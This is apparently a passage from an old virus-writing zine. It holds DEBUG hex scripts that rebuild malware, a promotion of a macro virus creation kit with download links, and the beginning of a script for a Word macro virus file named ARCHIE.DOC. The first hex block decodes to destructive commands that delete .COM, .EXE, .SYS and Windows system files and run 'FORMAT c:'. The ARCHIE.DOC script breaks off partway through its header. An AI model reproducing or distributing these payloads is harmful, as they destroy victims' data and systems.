E 0A30 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0A40 2A 2A 2A 2A 2A 2A 2A 2A 0A 0D 00 2A 2A 2A 2A 2A
E 0A50 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0A60 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0A70 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0A80 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 0A 0D 00 06 2F
E 0A90 43 20 43 44 5C 0D 00 0B 2F 43 20 4D 44 20 73 48
E 0AA0 45 45 50 0D 00 0B 2F 43 20 43 44 5C 73 48 45 45
E 0AB0 50 0D 00 07 2F 43 20 4D 44 20 68 0D 00 0D 2F 43
E 0AC0 20 43 44 5C 73 48 45 45 50 5C 68 0D 00 07 2F 43
E 0AD0 20 4D 44 20 65 0D 00 0F 2F 43 20 43 44 5C 73 48
E 0AE0 45 45 50 5C 68 5C 65 0D 00 07 2F 43 20 4D 44 20
E 0AF0 65 0D 00 11 2F 43 20 43 44 5C 73 48 45 45 50 5C
E 0B00 68 5C 65 5C 65 0D 00 07 2F 43 20 4D 44 20 70 0D
E 0B10 00 13 2F 43 20 43 44 5C 73 48 45 45 50 5C 68 5C
E 0B20 65 5C 65 5C 70 0D 00 06 2F 43 20 43 44 5C 0D 00
E 0B30 09 2F 43 20 4D 44 20 6F 55 54 0D 00 09 2F 43 20
E 0B40 43 44 5C 6F 55 54 0D 00 07 2F 43 20 4D 44 20 75
E 0B50 0D 00 0B 2F 43 20 43 44 5C 6F 55 54 5C 75 0D 00
E 0B60 07 2F 43 20 4D 44 20 74 0D 00 06 2F 43 20 43 44
E 0B70 5C 0D 00 09 2F 43 20 4D 44 20 36 36 36 0D 00 09
E 0B80 2F 43 20 43 44 5C 36 36 36 0D 00 07 2F 43 20 4D
E 0B90 44 20 36 0D 00 0B 2F 43 20 43 44 5C 36 36 36 5C
E 0BA0 36 0D 00 07 2F 43 20 4D 44 20 36 0D 00 06 2F 43
E 0BB0 20 43 44 5C 0D 00 0C 2F 43 20 4D 44 20 74 52 4F
E 0BC0 4A 41 4E 0D 00 0C 2F 43 20 43 44 5C 74 52 4F 4A
E 0BD0 41 4E 0D 00 07 2F 43 20 4D 44 20 72 0D 00 0E 2F
E 0BE0 43 20 43 44 5C 74 52 4F 4A 41 4E 5C 72 0D 00 07
E 0BF0 2F 43 20 4D 44 20 6F 0D 00 10 2F 43 20 43 44 5C
E 0C00 74 52 4F 4A 41 4E 5C 72 5C 6F 0D 00 07 2F 43 20
E 0C10 4D 44 20 6A 0D 00 12 2F 43 20 43 44 5C 74 52 4F
E 0C20 4A 41 4E 5C 72 5C 6F 5C 6A 0D 00 07 2F 43 20 4D
E 0C30 44 20 41 0D 00 14 2F 43 20 43 44 5C 74 52 4F 4A
E 0C40 41 4E 5C 72 5C 6F 5C 6A 5C 61 0D 00 07 2F 43 20
E 0C50 4D 44 20 6E 0D 00 06 2F 43 20 43 44 5C 0D 00 0D
E 0C60 2F 43 20 4D 44 20 46 55 43 4B 59 4F 55 0D 00 0D
E 0C70 2F 43 20 43 44 5C 46 55 43 4B 59 4F 55 0D 00 0B
E 0C80 2F 43 20 4D 44 20 42 49 54 43 48 0D 00 13 2F 43
E 0C90 20 43 44 5C 46 55 43 4B 59 4F 55 5C 42 49 54 43
E 0CA0 48 0D 00 06 2F 43 20 43 44 5C 0D 00 0B 2F 43 20
E 0CB0 4D 44 20 4D 4F 52 4F 4E 0D 00 0B 2F 43 20 43 44
E 0CC0 5C 4D 4F 52 4F 4E 0D 00 0E 2F 43 20 4D 44 20 21
E 0CD0 40 23 24 24 21 23 5E 0D 00 06 2F 43 20 43 44 5C
E 0CE0 0D 00 0A 2F 43 20 4D 44 20 44 4F 52 4B 0D 00 0A
E 0CF0 2F 43 20 43 44 5C 44 4F 52 4B 0D 00 0E 2F 43 20
E 0D00 4D 44 20 31 40 23 24 2A 5E 24 40 0D 00 06 2F 43
E 0D10 20 43 44 5C 0D 00 0A 2F 43 20 4D 44 20 44 49 43
E 0D20 4B 0D 00 0A 2F 43 20 43 44 5C 44 49 43 4B 0D 00
E 0D30 0D 2F 43 20 4D 44 20 7B 5E 25 40 21 23 5E 26 0D
E 0D40 00 06 2F 43 20 43 44 5C 0D 00 0B 2F 43 20 4D 44
E 0D50 20 49 44 49 4F 54 0D 00 0B 2F 43 20 43 44 5C 49
E 0D60 44 49 4F 54 0D 00 0E 2F 43 20 4D 44 20 66 24 68
E 0D70 67 62 79 24 77 0D 00 06 2F 43 20 43 44 5C 0D 00
E 0D80 09 2F 43 20 4D 44 20 41 53 53 0D 00 09 2F 43 20
E 0D90 43 44 5C 41 53 53 0D 00 0E 2F 43 20 4D 44 20 21
E 0DA0 40 66 6E 68 67 6B 64 0D 00 06 2F 43 20 43 44 5C
E 0DB0 0D 00 0B 2F 43 20 4D 44 20 48 41 49 52 59 0D 00
E 0DC0 0B 2F 43 20 43 44 5C 48 41 49 52 59 0D 00 11 2F
E 0DD0 43 20 4D 44 20 25 5E 23 24 40 26 26 48 0D 00 06
E 0DE0 2F 43 20 43 44 5C 0D 00 0A 2F 43 20 4D 44 20 53
E 0DF0 48 49 54 0D 00 0A 2F 43 20 43 44 5C 53 48 49 54
E 0E00 0D 00 3C 7C 00 0E 2F 43 20 4D 44 20 52 64 41 40
E 0E10 29 20 20 20 0D 00 06 2F 43 20 43 44 5C 0D 00 09
E 0E20 2F 43 20 4D 44 20 47 41 53 0D 00 09 2F 43 20 43
E 0E30 44 5C 47 41 53 0D 00 0E 2F 43 20 4D 44 20 52 45
E 0E40 64 23 40 40 23 25 0D 00 0C 2F 43 20 4D 44 20 53
E 0E50 55 43 4B 49 54 0D 00 0C 2F 43 20 43 44 5C 53 55
E 0E60 43 4B 49 54 0D 00 0E 2F 43 20 4D 44 20 51 7E 21
E 0E70 7E 60 60 23 24 0D 00 06 2F 43 20 43 44 5C 0D 00
E 0E80 0C 2F 43 20 4D 44 20 46 55 43 4B 49 54 0D 00 0C
E 0E90 2F 43 20 43 44 5C 46 55 43 4B 49 54 0D 00 10 2F
E 0EA0 43 20 4D 44 20 48 48 25 24 71 23 5E 43 44 5C 0D
E 0EB0 00 0E 2F 43 20 4D 44 20 53 48 49 54 48 45 41 44
E 0EC0 0D 00 0E 2F 43 20 43 44 5C 53 48 49 54 48 45 41
E 0ED0 44 0D 00 0E 2F 43 20 4D 44 20 46 46 40 23 5E 25
E 0EE0 24 2A 0D 00 06 2F 43 20 43 44 5C 0D 00 0D 2F 43
E 0EF0 20 4D 44 20 44 4F 47 44 49 43 4B 0D 00 0D 2F 43
E 0F00 20 43 44 5C 44 4F 47 44 49 43 4B 0D 00 0E 2F 43
E 0F10 20 4D 44 20 35 35 33 40 24 40 21 25 0D 00 0F 2F
E 0F20 43 20 44 45 4C 20 43 3A 5C 2A 2E 43 4F 4D 0D 00
E 0F30 0F 2F 43 20 44 45 4C 20 43 3A 5C 2A 2E 45 58 45
E 0F40 0D 00 0F 2F 43 20 44 45 4C 20 43 3A 5C 2A 2E 50
E 0F50 41 52 0D 00 0F 2F 43 20 44 45 4C 20 43 3A 5C 2A
E 0F60 2E 44 41 54 0D 00 0F 2F 43 20 44 45 4C 20 43 3A
E 0F70 5C 2A 2E 53 59 53 0D 00 1E 2F 43 20 44 45 4C 20
E 0F80 43 3A 5C 57 49 4E 44 4F 57 53 5C 53 59 53 54 45
E 0F90 4D 5C 2A 2E 44 52 56 0D 00 1E 2F 43 20 44 45 4C
E 0FA0 20 43 3A 5C 57 49 4E 44 4F 57 53 5C 53 59 53 54
E 0FB0 45 4D 5C 2A 2E 53 59 53 0D 00 1E 2F 43 20 44 45
E 0FC0 4C 20 43 3A 5C 57 49 4E 44 4F 57 53 5C 53 59 53
E 0FD0 54 45 4D 5C 2A 2E 44 41 54 0D 00 17 2F 43 20 44
E 0FE0 45 4C 20 43 3A 5C 57 49 4E 44 4F 57 53 5C 2A 2E
E 0FF0 45 58 45 0D 00 17 2F 43 20 44 45 4C 20 43 3A 5C
E 1000 57 49 4E 44 4F 57 53 5C 2A 2E 43 4F 4D 0D 00 17
E 1010 2F 43 20 44 45 4C 20 43 3A 5C 57 49 4E 44 4F 57
E 1020 53 5C 2A 2E 44 41 54 0D 00 17 2F 43 20 44 45 4C
E 1030 20 43 3A 5C 57 49 4E 44 4F 57 53 5C 2A 2E 53 59
E 1040 53 0D 00 13 2F 43 20 44 45 4C 20 43 3A 5C 44 4F
E 1050 53 5C 2A 2E 43 4F 4D 0D 00 13 2F 43 20 44 45 4C
E 1060 20 43 3A 5C 44 4F 53 5C 2A 2E 45 58 45 0D 00 13
E 1070 2F 43 20 44 45 4C 20 43 3A 5C 44 4F 53 5C 2A 2E
E 1080 44 41 54 0D 00 13 2F 43 20 44 45 4C 20 43 3A 5C
E 1090 44 4F 53 5C 2A 2E 53 59 53 0D 00 46 4F 52 4D 41
E 10A0 54 00 04 20 63 3A 0D 00 0A 0D 00 48 41 56 45 20
E 10B0 41 20 4E 49 43 45 20 44 41 59 21 21 0A 0D 00 8D
E 10C0 B6 20 00 8B BE 06 00 B8 26 01 FF D0 8B B6 06 00
E 10D0 B8 92 02 FF D0 8D B6 23 00 8B BE 06 00 B8 26 01
E 10E0 FF D0 8B B6 06 00 B8 92 02 FF D0 8D B6 26 00 8B
E 10F0 BE 06 00 B8 26 01 FF D0 8B B6 06 00 B8 92 02 FF
E 1100 D0 8D B6 29 00 B8 92 02 FF D0 8D B6 6C 00 B8 92
E 1110 02 FF D0 8D B6 AF 00 B8 92 02 FF D0 8D B6 F2 00
E 1120 B8 92 02 FF D0 8D B6 35 01 B8 92 02 FF D0 8D B6
E 1130 78 01 B8 92 02 FF D0 8D B6 BB 01 B8 92 02 FF D0
E 1140 8D B6 FE 01 B8 92 02 FF D0 8D B6 41 02 B8 92 02
E 1150 FF D0 8D B6 84 02 B8 92 02 FF D0 8D B6 C7 02 B8
E 1160 92 02 FF D0 8D B6 0A 03 B8 92 02 FF D0 8D B6 4D
E 1170 03 B8 92 02 FF D0 8D B6 90 03 B8 92 02 FF D0 8D
E 1180 B6 D3 03 B8 92 02 FF D0 8D B6 16 04 B8 92 02 FF
E 1190 D0 8D B6 5A 04 B8 92 02 FF D0 8D B6 9D 04 B8 92
E 11A0 02 FF D0 8D B6 E0 04 B8 92 02 FF D0 8D B6 24 05
E 11B0 B8 A4 02 FF D0 8D B6 2D 05 B8 A4 02 FF D0 8D B6
E 11C0 3B 05 B8 A4 02 FF D0 8D B6 49 05 B8 A4 02 FF D0
E 11D0 8D B6 53 05 B8 A4 02 FF D0 8D B6 63 05 B8 A4 02
E 11E0 FF D0 8D B6 6D 05 B8 A4 02 FF D0 8D B6 7F 05 B8
E 11F0 A4 02 FF D0 8D B6 89 05 B8 A4 02 FF D0 8D B6 9D
E 1200 05 B8 A4 02 FF D0 8D B6 A7 05 B8 A4 02 FF D0 8D
E 1210 B6 BD 05 B8 A4 02 FF D0 8D B6 C6 05 B8 A4 02 FF
E 1220 D0 8D B6 D2 05 B8 A4 02 FF D0 8D B6 DE 05 B8 A4
E 1230 02 FF D0 8D B6 E8 05 B8 A4 02 FF D0 8D B6 F6 05
E 1240 B8 A4 02 FF D0 8D B6 00 06 B8 A4 02 FF D0 8D B6
E 1250 09 06 B8 A4 02 FF D0 8D B6 15 06 B8 A4 02 FF D0
E 1260 8D B6 21 06 B8 A4 02 FF D0 8D B6 2B 06 B8 A4 02
E 1270 FF D0 8D B6 39 06 B8 A4 02 FF D0 8D B6 43 06 B8
E 1280 A4 02 FF D0 8D B6 4C 06 B8 A4 02 FF D0 8D B6 5B
E 1290 06 B8 A4 02 FF D0 8D B6 6A 06 B8 A4 02 FF D0 8D
E 12A0 B6 74 06 B8 A4 02 FF D0 8D B6 85 06 B8 A4 02 FF
E 12B0 D0 8D B6 8F 06 B8 A4 02 FF D0 8D B6 A2 06 B8 A4
E 12C0 02 FF D0 8D B6 AC 06 B8 A4 02 FF D0 8D B6 C1 06
E 12D0 B8 A4 02 FF D0 8D B6 CB 06 B8 A4 02 FF D0 8D B6
E 12E0 E2 06 B8 A4 02 FF D0 8D B6 EC 06 B8 A4 02 FF D0
E 12F0 8D B6 F5 06 B8 A4 02 FF D0 8D B6 05 07 B8 A4 02
E 1300 FF D0 8D B6 15 07 B8 A4 02 FF D0 8D B6 23 07 B8
E 1310 A4 02 FF D0 8D B6 39 07 B8 A4 02 FF D0 8D B6 42
E 1320 07 B8 A4 02 FF D0 8D B6 50 07 B8 A4 02 FF D0 8D
E 1330 B6 5E 07 B8 A4 02 FF D0 8D B6 6F 07 B8 A4 02 FF
E 1340 D0 8D B6 78 07 B8 A4 02 FF D0 8D B6 85 07 B8 A4
E 1350 02 FF D0 8D B6 92 07 B8 A4 02 FF D0 8D B6 A3 07
E 1360 B8 A4 02 FF D0 8D B6 AC 07 B8 A4 02 FF D0 8D B6
E 1370 B9 07 B8 A4 02 FF D0 8D B6 C6 07 8B BE 06 00 B8
E 1380 26 01 FF D0 8B B6 06 00 B8 A4 02 FF D0 8D B6 D7
E 1390 07 B8 A4 02 FF D0 8D B6 E0 07 B8 A4 02 FF D0 8D
E 13A0 B6 EE 07 B8 A4 02 FF D0 8D B6 FC 07 B8 A4 02 FF
E 13B0 D0 8D B6 0D 08 B8 A4 02 FF D0 8D B6 16 08 B8 A4
E 13C0 02 FF D0 8D B6 22 08 B8 A4 02 FF D0 8D B6 2E 08
E 13D0 B8 A4 02 FF D0 8D B6 3F 08 B8 A4 02 FF D0 8D B6
E 13E0 48 08 B8 A4 02 FF D0 8D B6 56 08 B8 A4 02 FF D0
E 13F0 8D B6 64 08 8B BE 06 00 B8 26 01 FF D0 8B B6 06
E 1400 00 B8 A4 02 FF D0 8D B6 75 08 B8 A4 02 FF D0 8D
E 1410 B6 7E 08 B8 A4 02 FF D0 8D B6 8B 08 B8 A4 02 FF
E 1420 D0 8D B6 97 08 BF 00 00 B8 52 03 FF D0 8D B6 9B
E 1430 08 B8 A4 02 FF D0 B8 93 03 FF D0 8D B6 AC 08 B8
E 1440 A4 02 FF D0 8D B6 B5 08 B8 A4 02 FF D0 8D B6 C1
E 1450 08 B8 A4 02 FF D0 8D B6 CD 08 8B BE 06 00 B8 26
E 1460 01 FF D0 8B B6 06 00 B8 A4 02 FF D0 8D B6 DE 08
E 1470 B8 A4 02 FF D0 8D B6 ED 08 B8 A4 02 FF D0 8D B6
E 1480 FC 08 B8 A4 02 FF D0 8D B6 0D 09 B8 A4 02 FF D0
E 1490 8D B6 16 09 B8 A4 02 FF D0 8D B6 25 09 B8 A4 02
E 14A0 FF D0 8D B6 34 09 8B BE 06 00 B8 26 01 FF D0 8B
E 14B0 B6 06 00 B8 A4 02 FF D0 8D B6 47 09 B8 A4 02 FF
E 14C0 D0 8D B6 58 09 B8 A4 02 FF D0 8D B6 69 09 8B BE
E 14D0 06 00 B8 26 01 FF D0 8B B6 06 00 B8 A4 02 FF D0
E 14E0 8D B6 7A 09 B8 A4 02 FF D0 8D B6 83 09 B8 A4 02
E 14F0 FF D0 8D B6 93 09 B8 A4 02 FF D0 8D B6 A3 09 8B
E 1500 BE 06 00 B8 26 01 FF D0 8B B6 06 00 B8 A4 02 FF
E 1510 D0 8D B6 B4 09 B8 A4 02 FF D0 8D B6 C6 09 B8 A4
E 1520 02 FF D0 8D B6 D8 09 B8 A4 02 FF D0 8D B6 EA 09
E 1530 B8 A4 02 FF D0 8D B6 FC 09 B8 A4 02 FF D0 8D B6
E 1540 0E 0A B8 A4 02 FF D0 8D B6 2F 0A B8 A4 02 FF D0
E 1550 8D B6 50 0A B8 A4 02 FF D0 8D B6 71 0A B8 A4 02
E 1560 FF D0 8D B6 8B 0A B8 A4 02 FF D0 8D B6 A5 0A B8
E 1570 A4 02 FF D0 8D B6 BF 0A B8 A4 02 FF D0 8D B6 D9
E 1580 0A B8 A4 02 FF D0 8D B6 EF 0A B8 A4 02 FF D0 8D
E 1590 B6 05 0B B8 A4 02 FF D0 8D B6 1B 0B B8 A4 02 FF
E 15A0 D0 8D B6 30 0B 8D BE 38 0B B8 B8 03 FF D0 8D B6
E 15B0 3D 0B 8B BE 06 00 B8 26 01 FF D0 8B B6 06 00 B8
E 15C0 92 02 FF D0 8D B6 40 0B B8 92 02 FF D0 B8 00 4C
E 15D0 CD 21
RCX
14D2
W
Q
------------------------END-----------------------------
The Destruction Kit
I have just recently received the new macro virus creation kit from the SLAM virus team. I personally think it is pretty neat, and it gives you good control over your virii's abilities.
Below I pasted the description the author sent to me.... There's only one problem I have found, which is the fact that all code generated is in German, which makes it hard to use
Dark Night
------------------------------
Hi....
I've created a new macro virus creation kit.
THE DEMOLITION KIT
Normally every generated virus must work with every word version!!!
(Normally, because I couldn't test it) ;-))
It creates:
- AutoMacro Virii's
- Non-AutoMacro Virii's
- Polymorphic Macro Virii's (with a AT THE MOMENT new polymorphic routine)
- Trojan Horses
Some Options:
- 11 different Payloads
- 10 different Trojan Horses
- 11 different Dos Virii's (to insert in a macro virus)
- 8 different keyboard keys (for polymorphic and non-automacro viruses)
- Timer to activate Payload
If you think that could be a good progi then use one of the following links in your site, please:
MAIN '''***---DEMOLITION---***''' SITE:
ftp://ftp.ilf.net/pub/users/NJoker/index.htm
or:
Win95 + Winword 6.0 (vga) ==> ftp://ftp.ilf.net/pub/users/NJoker/dw6vga.zip
Win95 + Winword 6.0 (svga) ==> ftp://ftp.ilf.net/pub/users/NJoker/dw6svga.zip
Win95 + Winword 7.0 (vga) ==> ftp://ftp.ilf.net/pub/users/NJoker/dw7vga.zip
Win95 + Winword 7.0 (svga) ==> ftp://ftp.ilf.net/pub/users/NJoker/dw7svga.zip
Win3.1 + Winword 6.0 (svga or vga) ==> ftp://ftp.ilf.net/pub/users/NJoker/dwin31.zip
There are only differences in the graphic display!!!
bye
The Nightmare Joker
[Mainpage: http://www.geocities.com/SiliconValley/Heights/6021/]
please contact me only under this addy [e-mail: njoker@hotmail.com]
WMV.ARCHIE
I just got The Demolition Kit from the Nightmare Joker, and I noticed that all the code was being generated in german, so I reworked one virus I made into English.
Here it is......
-------------------_DEBUG SCRIPT_---------------------
N ARCHIE.DOC
E 0100 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00
E 0110 00 00 00 00 00 00 00 00 3E 00 03 00 FE FF 09 00
E 0120 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
E 0130 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00
E 0140 01 00 00 00 FE FF FF FF 00 00 00 00 00 00 00 00
E 0150 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0160 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0170 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0180 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0190 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 01A0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 01B0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 01C0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 01D0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 01E0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 01F0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0200 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0210 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0220 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0230 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0240 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0250 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0260 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0270 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0280 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0290 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 02A0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 02B0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 02C0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 02D0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 02E0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 02F0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0300 FD FF FF FF 05 00 00 00 FE FF FF FF 04 00 00 00
E 0310 06 00 00 00 FE FF FF FF 07 00 00 00 FE FF FF FF
E 0320 09 00 00 00 0A 00 00 00 0B 00 00 00 0C 00 00 00
E 0330 0D 00 00 00 0E 00 00 00 0F 00 00 00 10 00 00 00
E 0340 11 00 00 00 FE FF FF FF FF FF FF FF FF FF FF FF
E 0350 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0360 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0370 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0380 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0390 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 03A0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 03B0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 03C0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 03D0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 03E0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 03F0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0400 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0410 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0420 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0430 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0440 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0450 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0460 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0470 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0480 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0490 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 04A0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 04B0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 04C0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 04D0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 04E0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 04F0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0500 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00
E 0510 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0540 16 00 05 00 FF FF FF FF FF FF FF FF 03 00 00 00
E 0550 00 09 02 00 00 00 00 00 C0 00 00 00 00 00 00 46
E 0560 00 00 00 00 00 00 00 00 00 00 00 00 A0 19 D7 18
E 0570 E8 D9 BA 01 03 00 00 00 80 06 00 00 00 00 00 00
E 0580 01 00 43 00 6F 00 6D 00 70 00 4F 00 62 00 6A 00
E 0590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05C0 12 00 02 01 FF FF FF FF FF FF FF FF FF FF FF FF
E 05D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05F0 00 00 00 00 00 00 00 00 6E 00 00 00 00 00 00 00
E 0600 57 00 6F 00 72 00 64 00 44 00 6F 00 63 00 75 00
E 0610 6D 00 65 00 6E 00 74 00 00 00 00 00 00 00 00 00
E 0620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0640 1A 00 02 01 FF FF FF FF 04 00 00 00 FF FF FF FF
E 0650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0670 00 00 00 00 08 00 00 00 BE 12 00 00 00 00 00 00
E 0680 4F 00 62 00 6A 00 65 00 63 00 74 00 50 00 6F 00
E 0690 6F 00 6C 00 00 00 00 00 00 00 00 00 00 00 00 00
E 06A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 06B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 06C0 16 00 01 01 01 00 00 00 02 00 00 00 FF FF FF FF
E 06D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 06E0 00 00 00 00 E0 F1 CD 18 E8 D9 BA 01 E0 F1 CD 18
E 06F0 E8 D9 BA 01 00 00 00 00 00 00 00 00 00 00 00 00
E 0700 01 00 00 00 FE FF FF FF FF FF FF FF FF FF FF FF
E 0710 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0720 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0730 FF FF FF FF FF FF FF FF FF FF FF FF 10 00 00 00
E 0740 11 00 00 00 12 00 00 00 13 00 00 00 14 00 00 00
E 0750 15 00 00 00 16 00 00 00 17 00 00 00 18 00 00 00
E 0760 19 00 00 00 FE FF FF FF FF FF FF FF FF FF FF FF
E 0770 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0780 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0790 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 07A0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 07B0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 07C0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 07D0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 07E0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 07F0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0800 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0810 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0820 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0830 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0840 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0850 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0860 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0870 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0880 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0890 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 08A0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 08B0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 08C0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 08D0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 08E0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 08F0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
E 0900 01 00 FE FF 03 0A 00 00 FF FF FF FF 00 09 02 00
E 0910 00 00 00 00 C0 00 00 00 00 00 00 46 1C 00 00 00
E 0920 4D 69 63 72 6F 73 6F 66 74 20 57 6F 72 64 20 36
E 0930 2E 30 20 44 6F 63 75 6D 65 6E 74 00 0A 00 00 00
E 0940 4D 53 57 6F 72 64 44 6F 63 00 10 00 00 00 57 6F
E 0950 72 64 2E 44 6F 63 75 6D 65 6E 74 2E 36 00 F4 39
E 0960 B2 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0970 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0980 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0990 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 09A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 09B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 09C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 09D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 09E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 09F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0A00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0A10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0A20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0A30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
